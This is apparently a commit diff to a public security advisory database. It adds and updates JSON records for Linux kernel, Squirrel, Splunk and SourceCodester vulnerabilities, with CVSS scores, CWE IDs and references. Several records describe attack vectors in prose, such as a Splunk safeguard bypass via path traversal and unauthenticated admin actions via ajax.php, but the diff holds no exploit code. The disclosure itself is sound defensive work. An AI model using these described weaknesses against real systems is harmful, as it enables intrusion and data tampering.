.../GHSA-m4f3-qp2w-gwh6.json | 40 ++++++++ .../GHSA-m4v3-95xp-3j5h.json | 33 +++++++ .../GHSA-mc8x-4j6m-qj3r.json | 6 +- .../GHSA-mx4x-pxgm-r77w.json | 37 +++++++ .../GHSA-p525-h9pq-233r.json | 29 ++++++ .../GHSA-p68h-c56f-p3v6.json | 41 ++++++++ .../GHSA-q5q3-fgwr-rr9h.json | 4 +- .../GHSA-v3v9-r7ff-976x.json | 33 +++++++ .../GHSA-v9g2-54rr-mxmg.json | 4 +- .../GHSA-w35p-gjc5-2g6r.json | 44 +++++++++ .../GHSA-w94g-pmcx-r454.json | 41 ++++++++ .../GHSA-wfhp-qgm8-5p5c.json | 15 ++- .../GHSA-wp4v-6rrv-wqv9.json | 4 +- .../GHSA-wxwg-9693-mqg4.json | 4 +- .../GHSA-xfjv-gcf8-3jqc.json | 6 +- .../GHSA-xw73-fccw-fgc4.json | 36 +++++++ .../GHSA-xw8j-p597-rjrj.json | 4 +- 70 files changed, 1803 insertions(+), 29 deletions(-) create mode 100644 advisories/unreviewed/2026/02/GHSA-365g-rr2h-rx65/GHSA-365g-rr2h-rx65.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3w2g-4qx3-2mmw/GHSA-3w2g-4qx3-2mmw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4mcw-fcqm-vqg3/GHSA-4mcw-fcqm-vqg3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4v8p-q39m-4pj8/GHSA-4v8p-q39m-4pj8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-4vmx-r9fj-4cm5/GHSA-4vmx-r9fj-4cm5.json create mode 100644 advisories/unreviewed/2026/02/GHSA-55vh-w3p8-qq9g/GHSA-55vh-w3p8-qq9g.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5jgq-pv8m-5cx7/GHSA-5jgq-pv8m-5cx7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5pqm-c33h-22jc/GHSA-5pqm-c33h-22jc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5q5x-wqxc-vv25/GHSA-5q5x-wqxc-vv25.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5qf3-3gp9-pjx6/GHSA-5qf3-3gp9-pjx6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-5qq8-6gv4-wmcc/GHSA-5qq8-6gv4-wmcc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-64jv-v62f-2xrg/GHSA-64jv-v62f-2xrg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6rjp-j8mc-4f57/GHSA-6rjp-j8mc-4f57.json create mode 100644 advisories/unreviewed/2026/02/GHSA-6xrx-3vj8-2rjc/GHSA-6xrx-3vj8-2rjc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-78xc-39m5-v2c6/GHSA-78xc-39m5-v2c6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7fjm-558r-4j8r/GHSA-7fjm-558r-4j8r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7p94-766c-hgjp/GHSA-7p94-766c-hgjp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-876r-52fj-4pxf/GHSA-876r-52fj-4pxf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8j5g-3q2r-xfjh/GHSA-8j5g-3q2r-xfjh.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8rqj-9226-cwx7/GHSA-8rqj-9226-cwx7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9pjv-cqr5-4xh7/GHSA-9pjv-cqr5-4xh7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9wwr-2jh3-482p/GHSA-9wwr-2jh3-482p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-chpq-fr33-gp2m/GHSA-chpq-fr33-gp2m.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f2fg-5m3g-hqwv/GHSA-f2fg-5m3g-hqwv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f5pv-9whq-7mv7/GHSA-f5pv-9whq-7mv7.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f7pj-q7w5-89fg/GHSA-f7pj-q7w5-89fg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fqrv-m9rv-j33j/GHSA-fqrv-m9rv-j33j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-g3vh-wfh4-fp76/GHSA-g3vh-wfh4-fp76.json create mode 100644 advisories/unreviewed/2026/02/GHSA-h437-rr98-fx56/GHSA-h437-rr98-fx56.json create mode 100644 advisories/unreviewed/2026/02/GHSA-hcrc-x9p4-f9jh/GHSA-hcrc-x9p4-f9jh.json create mode 100644 advisories/unreviewed/2026/02/GHSA-j6h2-wr53-6vcg/GHSA-j6h2-wr53-6vcg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-j87r-wgfm-7fjj/GHSA-j87r-wgfm-7fjj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jp99-8xc8-367m/GHSA-jp99-8xc8-367m.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m34c-wrf8-mw69/GHSA-m34c-wrf8-mw69.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m4f3-qp2w-gwh6/GHSA-m4f3-qp2w-gwh6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-m4v3-95xp-3j5h/GHSA-m4v3-95xp-3j5h.json create mode 100644 advisories/unreviewed/2026/02/GHSA-mx4x-pxgm-r77w/GHSA-mx4x-pxgm-r77w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p525-h9pq-233r/GHSA-p525-h9pq-233r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-p68h-c56f-p3v6/GHSA-p68h-c56f-p3v6.json create mode 100644 advisories/unreviewed/2026/02/GHSA-v3v9-r7ff-976x/GHSA-v3v9-r7ff-976x.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w35p-gjc5-2g6r/GHSA-w35p-gjc5-2g6r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w94g-pmcx-r454/GHSA-w94g-pmcx-r454.json create mode 100644 advisories/unreviewed/2026/02/GHSA-xw73-fccw-fgc4/GHSA-xw73-fccw-fgc4.json diff --git a/advisories/unreviewed/2022/05/GHSA-4gm2-v7j4-74p8/GHSA-4gm2-v7j4-74p8.json b/advisories/unreviewed/2022/05/GHSA-4gm2-v7j4-74p8/GHSA-4gm2-v7j4-74p8.json index 34296f8127264..18992c855b6e2 100644 --- a/advisories/unreviewed/2022/05/GHSA-4gm2-v7j4-74p8/GHSA-4gm2-v7j4-74p8.json +++ b/advisories/unreviewed/2022/05/GHSA-4gm2-v7j4-74p8/GHSA-4gm2-v7j4-74p8.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-4gm2-v7j4-74p8", - "modified": "2022-05-24T19:05:05Z", + "modified": "2026-02-18T18:30:19Z", "published": "2022-05-24T19:05:05Z", "aliases": [ "CVE-2021-22175" ], "details": "When requests to the internal network for webhooks are enabled, a server-side request forgery vulnerability in GitLab affecting all versions starting from 10.5 was possible to exploit for an unauthenticated attacker even on a GitLab instance where registration is disabled", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -25,6 +30,10 @@ { "type": "WEB", "url": "https://gitlab.com/gitlab-org/gitlab/-/issues/294178" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-22175" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/07/GHSA-2764-3pqr-49w6/GHSA-2764-3pqr-49w6.json b/advisories/unreviewed/2023/07/GHSA-2764-3pqr-49w6/GHSA-2764-3pqr-49w6.json index 9f712b78b0ba9..a6f235ddebcc8 100644 --- a/advisories/unreviewed/2023/07/GHSA-2764-3pqr-49w6/GHSA-2764-3pqr-49w6.json +++ b/advisories/unreviewed/2023/07/GHSA-2764-3pqr-49w6/GHSA-2764-3pqr-49w6.json @@ -59,7 +59,8 @@ "database_specific": { "cwe_ids": [ "CWE-200", - "CWE-362" + "CWE-362", + "CWE-413" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2023/08/GHSA-9cmp-2g73-ff98/GHSA-9cmp-2g73-ff98.json b/advisories/unreviewed/2023/08/GHSA-9cmp-2g73-ff98/GHSA-9cmp-2g73-ff98.json index c5258203a0c0c..bfdaa829a47db 100644 --- a/advisories/unreviewed/2023/08/GHSA-9cmp-2g73-ff98/GHSA-9cmp-2g73-ff98.json +++ b/advisories/unreviewed/2023/08/GHSA-9cmp-2g73-ff98/GHSA-9cmp-2g73-ff98.json @@ -70,6 +70,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-1188", "CWE-843", "CWE-863" ], diff --git a/advisories/unreviewed/2023/11/GHSA-qhp7-446p-xq88/GHSA-qhp7-446p-xq88.json b/advisories/unreviewed/2023/11/GHSA-qhp7-446p-xq88/GHSA-qhp7-446p-xq88.json index 33a6aa0c2b5dc..18eb340f30b73 100644 --- a/advisories/unreviewed/2023/11/GHSA-qhp7-446p-xq88/GHSA-qhp7-446p-xq88.json +++ b/advisories/unreviewed/2023/11/GHSA-qhp7-446p-xq88/GHSA-qhp7-446p-xq88.json @@ -46,6 +46,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-366", "CWE-416" ], "severity": "HIGH", diff --git a/advisories/unreviewed/2023/11/GHSA-xr9j-c7v6-7542/GHSA-xr9j-c7v6-7542.json b/advisories/unreviewed/2023/11/GHSA-xr9j-c7v6-7542/GHSA-xr9j-c7v6-7542.json index 363cea0377cd2..6a9fb9133ed39 100644 --- a/advisories/unreviewed/2023/11/GHSA-xr9j-c7v6-7542/GHSA-xr9j-c7v6-7542.json +++ b/advisories/unreviewed/2023/11/GHSA-xr9j-c7v6-7542/GHSA-xr9j-c7v6-7542.json @@ -126,6 +126,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-1341", "CWE-416" ], "severity": "HIGH", diff --git a/advisories/unreviewed/2023/12/GHSA-v727-f437-6cxx/GHSA-v727-f437-6cxx.json b/advisories/unreviewed/2023/12/GHSA-v727-f437-6cxx/GHSA-v727-f437-6cxx.json index c09713c594b15..fe744acbd6aef 100644 --- a/advisories/unreviewed/2023/12/GHSA-v727-f437-6cxx/GHSA-v727-f437-6cxx.json +++ b/advisories/unreviewed/2023/12/GHSA-v727-f437-6cxx/GHSA-v727-f437-6cxx.json @@ -147,6 +147,7 @@ "database_specific": { "cwe_ids": [ "CWE-362", + "CWE-366", "CWE-416" ], "severity": "HIGH", diff --git a/advisories/unreviewed/2024/01/GHSA-prhq-c3gx-jhwg/GHSA-prhq-c3gx-jhwg.json b/advisories/unreviewed/2024/01/GHSA-prhq-c3gx-jhwg/GHSA-prhq-c3gx-jhwg.json index f32e842d8d777..9ea353073359f 100644 --- a/advisories/unreviewed/2024/01/GHSA-prhq-c3gx-jhwg/GHSA-prhq-c3gx-jhwg.json +++ b/advisories/unreviewed/2024/01/GHSA-prhq-c3gx-jhwg/GHSA-prhq-c3gx-jhwg.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-416" + "CWE-416", + "CWE-911" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-2whf-r4r4-c662/GHSA-2whf-r4r4-c662.json b/advisories/unreviewed/2026/02/GHSA-2whf-r4r4-c662/GHSA-2whf-r4r4-c662.json index be50268e17c4d..bcba65ece4f7e 100644 --- a/advisories/unreviewed/2026/02/GHSA-2whf-r4r4-c662/GHSA-2whf-r4r4-c662.json +++ b/advisories/unreviewed/2026/02/GHSA-2whf-r4r4-c662/GHSA-2whf-r4r4-c662.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-2whf-r4r4-c662", - "modified": "2026-02-03T09:30:28Z", + "modified": "2026-02-18T18:30:22Z", "published": "2026-02-03T09:30:28Z", "aliases": [ "CVE-2026-1592" diff --git a/advisories/unreviewed/2026/02/GHSA-365g-rr2h-rx65/GHSA-365g-rr2h-rx65.json b/advisories/unreviewed/2026/02/GHSA-365g-rr2h-rx65/GHSA-365g-rr2h-rx65.json new file mode 100644 index 0000000000000..414c99dc1227c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-365g-rr2h-rx65/GHSA-365g-rr2h-rx65.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-365g-rr2h-rx65", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-71234" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtl8xxxu: fix slab-out-of-bounds in rtl8xxxu_sta_add\n\nThe driver does not set hw->sta_data_size, which causes mac80211 to\nallocate insufficient space for driver private station data in\n__sta_info_alloc(). When rtl8xxxu_sta_add() accesses members of\nstruct rtl8xxxu_sta_info through sta->drv_priv, this results in a\nslab-out-of-bounds write.\n\nKASAN report on RISC-V (VisionFive 2) with RTL8192EU adapter:\n\n BUG: KASAN: slab-out-of-bounds in rtl8xxxu_sta_add+0x31c/0x346\n Write of size 8 at addr ffffffd6d3e9ae88 by task kworker/u16:0/12\n\nSet hw->sta_data_size to sizeof(struct rtl8xxxu_sta_info) during\nprobe, similar to how hw->vif_data_size is configured. This ensures\nmac80211 allocates sufficient space for the driver's per-station\nprivate data.\n\nTested on StarFive VisionFive 2 v1.2A board.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71234" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/116f7bd8160c6b37d1c6939385abf90f6f6ed2f5" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5d810ba377eddee95d30766d360a14efbb3d1872" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/9a0f3fa6ecd0c9c32dbc367a57482bbf7c7d25bf" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3cgw-cpcx-p7g4/GHSA-3cgw-cpcx-p7g4.json b/advisories/unreviewed/2026/02/GHSA-3cgw-cpcx-p7g4/GHSA-3cgw-cpcx-p7g4.json index ed7c19f52426f..1b0108fbfed45 100644 --- a/advisories/unreviewed/2026/02/GHSA-3cgw-cpcx-p7g4/GHSA-3cgw-cpcx-p7g4.json +++ b/advisories/unreviewed/2026/02/GHSA-3cgw-cpcx-p7g4/GHSA-3cgw-cpcx-p7g4.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-377" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-3w2g-4qx3-2mmw/GHSA-3w2g-4qx3-2mmw.json b/advisories/unreviewed/2026/02/GHSA-3w2g-4qx3-2mmw/GHSA-3w2g-4qx3-2mmw.json new file mode 100644 index 0000000000000..b6f90184c3909 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3w2g-4qx3-2mmw/GHSA-3w2g-4qx3-2mmw.json @@ -0,0 +1,41 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3w2g-4qx3-2mmw", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-71232" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Free sp in error path to fix system crash\n\nSystem crash seen during load/unload test in a loop,\n\n[61110.449331] qla2xxx [0000:27:00.0]-0042:0: Disabled MSI-X.\n[61110.467494] =============================================================================\n[61110.467498] BUG qla2xxx_srbs (Tainted: G OE -------- --- ): Objects remaining in qla2xxx_srbs on __kmem_cache_shutdown()\n[61110.467501] -----------------------------------------------------------------------------\n\n[61110.467502] Slab 0x000000000ffc8162 objects=51 used=1 fp=0x00000000e25d3d85 flags=0x57ffffc0010200(slab|head|node=1|zone=2|lastcpupid=0x1fffff)\n[61110.467509] CPU: 53 PID: 455206 Comm: rmmod Kdump: loaded Tainted: G OE -------- --- 5.14.0-284.11.1.el9_2.x86_64 #1\n[61110.467513] Hardware name: HPE ProLiant DL385 Gen10 Plus v2/ProLiant DL385 Gen10 Plus v2, BIOS A42 08/17/2023\n[61110.467515] Call Trace:\n[61110.467516] \n[61110.467519] dump_stack_lvl+0x34/0x48\n[61110.467526] slab_err.cold+0x53/0x67\n[61110.467534] __kmem_cache_shutdown+0x16e/0x320\n[61110.467540] kmem_cache_destroy+0x51/0x160\n[61110.467544] qla2x00_module_exit+0x93/0x99 [qla2xxx]\n[61110.467607] ? __do_sys_delete_module.constprop.0+0x178/0x280\n[61110.467613] ? syscall_trace_enter.constprop.0+0x145/0x1d0\n[61110.467616] ? do_syscall_64+0x5c/0x90\n[61110.467619] ? exc_page_fault+0x62/0x150\n[61110.467622] ? entry_SYSCALL_64_after_hwframe+0x63/0xcd\n[61110.467626] \n[61110.467627] Disabling lock debugging due to kernel taint\n[61110.467635] Object 0x0000000026f7e6e6 @offset=16000\n[61110.467639] ------------[ cut here ]------------\n[61110.467639] kmem_cache_destroy qla2xxx_srbs: Slab cache still has objects when called from qla2x00_module_exit+0x93/0x99 [qla2xxx]\n[61110.467659] WARNING: CPU: 53 PID: 455206 at mm/slab_common.c:520 kmem_cache_destroy+0x14d/0x160\n[61110.467718] CPU: 53 PID: 455206 Comm: rmmod Kdump: loaded Tainted: G B OE -------- --- 5.14.0-284.11.1.el9_2.x86_64 #1\n[61110.467720] Hardware name: HPE ProLiant DL385 Gen10 Plus v2/ProLiant DL385 Gen10 Plus v2, BIOS A42 08/17/2023\n[61110.467721] RIP: 0010:kmem_cache_destroy+0x14d/0x160\n[61110.467724] Code: 99 7d 07 00 48 89 ef e8 e1 6a 07 00 eb b3 48 8b 55 60 48 8b 4c 24 20 48 c7 c6 70 fc 66 90 48 c7 c7 f8 ef a1 90 e8 e1 ed 7c 00 <0f> 0b eb 93 c3 cc cc cc cc 66 2e 0f 1f 84 00 00 00 00 00 55 48 89\n[61110.467725] RSP: 0018:ffffa304e489fe80 EFLAGS: 00010282\n[61110.467727] RAX: 0000000000000000 RBX: ffffffffc0d9a860 RCX: 0000000000000027\n[61110.467729] RDX: ffff8fd5ff9598a8 RSI: 0000000000000001 RDI: ffff8fd5ff9598a0\n[61110.467730] RBP: ffff8fb6aaf78700 R08: 0000000000000000 R09: 0000000100d863b7\n[61110.467731] R10: ffffa304e489fd20 R11: ffffffff913bef48 R12: 0000000040002000\n[61110.467731] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000\n[61110.467733] FS: 00007f64c89fb740(0000) GS:ffff8fd5ff940000(0000) knlGS:0000000000000000\n[61110.467734] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[61110.467735] CR2: 00007f0f02bfe000 CR3: 00000020ad6dc005 CR4: 0000000000770ee0\n[61110.467736] PKRU: 55555554\n[61110.467737] Call Trace:\n[61110.467738] \n[61110.467739] qla2x00_module_exit+0x93/0x99 [qla2xxx]\n[61110.467755] ? __do_sys_delete_module.constprop.0+0x178/0x280\n\nFree sp in the error path to fix the crash.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71232" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/05fcd590e5fbbb3e9e1b4fc6c23c98a1d38cf256" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/19ac050ef09a2f0a9d9787540f77bb45cf9033e8" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/aed16d37696f494288a291b4b477484ed0be774b" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/f04840512438ac025dea6e357d80a986b28bbe4c" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4mcw-fcqm-vqg3/GHSA-4mcw-fcqm-vqg3.json b/advisories/unreviewed/2026/02/GHSA-4mcw-fcqm-vqg3/GHSA-4mcw-fcqm-vqg3.json new file mode 100644 index 0000000000000..d86d7cbb0aaa8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4mcw-fcqm-vqg3/GHSA-4mcw-fcqm-vqg3.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4mcw-fcqm-vqg3", + "modified": "2026-02-18T18:30:41Z", + "published": "2026-02-18T18:30:41Z", + "aliases": [ + "CVE-2026-2659" + ], + "details": "A vulnerability was determined in Squirrel up to 3.2. Affected by this vulnerability is the function SQFuncState::PopTarget of the file src/squirrel/squirrel/sqfuncstate.cpp. Executing a manipulation of the argument _target_stack can lead to out-of-bounds read. It is possible to launch the attack on the local host. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2659" + }, + { + "type": "WEB", + "url": "https://github.com/albertodemichelis/squirrel/issues/311" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0122/blob/main/i311/repro" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346457" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346457" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753163" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4v8p-q39m-4pj8/GHSA-4v8p-q39m-4pj8.json b/advisories/unreviewed/2026/02/GHSA-4v8p-q39m-4pj8/GHSA-4v8p-q39m-4pj8.json new file mode 100644 index 0000000000000..9197d31f0a4f7 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4v8p-q39m-4pj8/GHSA-4v8p-q39m-4pj8.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4v8p-q39m-4pj8", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-20137" + ], + "details": "In Splunk Enterprise versions below 10.2.0, 10.0.3, 9.4.5, 9.3.7, and 9.2.9, and Splunk Cloud Platform versions below 10.1.2507.0, 10.0.2503.9, 9.3.2411.112, and 9.3.2408.122, a low-privileged user who does not hold the \"admin\" or \"power\" Splunk roles could bypass the SPL safeguards for risky commands when they create a Data Model that contains an injected SPL query within an object. They can bypass the safeguards by exploiting a path traversal vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20137" + }, + { + "type": "WEB", + "url": "https://advisory.splunk.com/advisories/SVD-2026-0202" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-4vmx-r9fj-4cm5/GHSA-4vmx-r9fj-4cm5.json b/advisories/unreviewed/2026/02/GHSA-4vmx-r9fj-4cm5/GHSA-4vmx-r9fj-4cm5.json new file mode 100644 index 0000000000000..81c8fc769fd04 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4vmx-r9fj-4cm5/GHSA-4vmx-r9fj-4cm5.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4vmx-r9fj-4cm5", + "modified": "2026-02-18T18:30:41Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-20139" + ], + "details": "In Splunk Enterprise versions below 10.2.0, 10.0.2, 9.4.8, 9.3.9, and 9.2.12, and Splunk Cloud Platform versions below 10.2.2510.3, 10.1.2507.8, 10.0.2503.9, and 9.3.2411.121, a low-privileged user that does not hold the \"admin\" or \"power\" Splunk roles could craft a malicious payload into the `realname`, `tz`, or `email` parameters of the `/splunkd/__raw/services/authentication/users/username` REST API endpoint when they change a password. This could potentially lead to a client‑side denial‑of‑service (DoS). The malicious payload might significantly slow page load times or render Splunk Web temporarily unresponsive.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20139" + }, + { + "type": "WEB", + "url": "https://advisory.splunk.com/advisories/SVD-2026-0204" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T18:24:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-55vh-w3p8-qq9g/GHSA-55vh-w3p8-qq9g.json b/advisories/unreviewed/2026/02/GHSA-55vh-w3p8-qq9g/GHSA-55vh-w3p8-qq9g.json new file mode 100644 index 0000000000000..5f43ff3dcbfb9 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-55vh-w3p8-qq9g/GHSA-55vh-w3p8-qq9g.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-55vh-w3p8-qq9g", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-70141" + ], + "details": "SourceCodester Customer Support System 1.0 contains an incorrect access control vulnerability in ajax.php. The AJAX dispatcher does not enforce authentication or authorization before invoking administrative methods in admin_class.php based on the action parameter. An unauthenticated remote attacker can perform sensitive operations such as creating customers and deleting users (including the admin account), as well as modifying or deleting other application records (tickets, departments, comments), resulting in unauthorized data modification.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70141" + }, + { + "type": "WEB", + "url": "https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code" + }, + { + "type": "WEB", + "url": "https://youngkevinn.github.io/posts/CVE-2025-70141-Customer-Support-BAC" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T17:21:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5jgq-pv8m-5cx7/GHSA-5jgq-pv8m-5cx7.json b/advisories/unreviewed/2026/02/GHSA-5jgq-pv8m-5cx7/GHSA-5jgq-pv8m-5cx7.json new file mode 100644 index 0000000000000..95597dbc48090 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5jgq-pv8m-5cx7/GHSA-5jgq-pv8m-5cx7.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5jgq-pv8m-5cx7", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2026-23226" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nksmbd: add chann_lock to protect ksmbd_chann_list xarray\n\nksmbd_chann_list xarray lacks synchronization, allowing use-after-free in\nmulti-channel sessions (between lookup_chann_list() and ksmbd_chann_del).\n\nAdds rw_semaphore chann_lock to struct ksmbd_session and protects\nall xa_load/xa_store/xa_erase accesses.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23226" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/36ef605c0395b94b826a8c8d6f2697071173de6e" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/e4a8a96a93d08570e0405cfd989a8a07e5b6ff33" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T16:22:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-5pqm-c33h-22jc/GHSA-5pqm-c33h-22jc.json b/advisories/unreviewed/2026/02/GHSA-5pqm-c33h-22jc/GHSA-5pqm-c33h-22jc.json new file mode 100644 index 0000000000000..89bf8cfaa988e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-5pqm-c33h-22jc/GHSA-5pqm-c33h-22jc.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-5pqm-c33h-22jc", + "modified": "2026-02-18T18:30:40Z", + "published": "2026-02-18T18:30:40Z", + "aliases": [ + "CVE-2025-70146" + 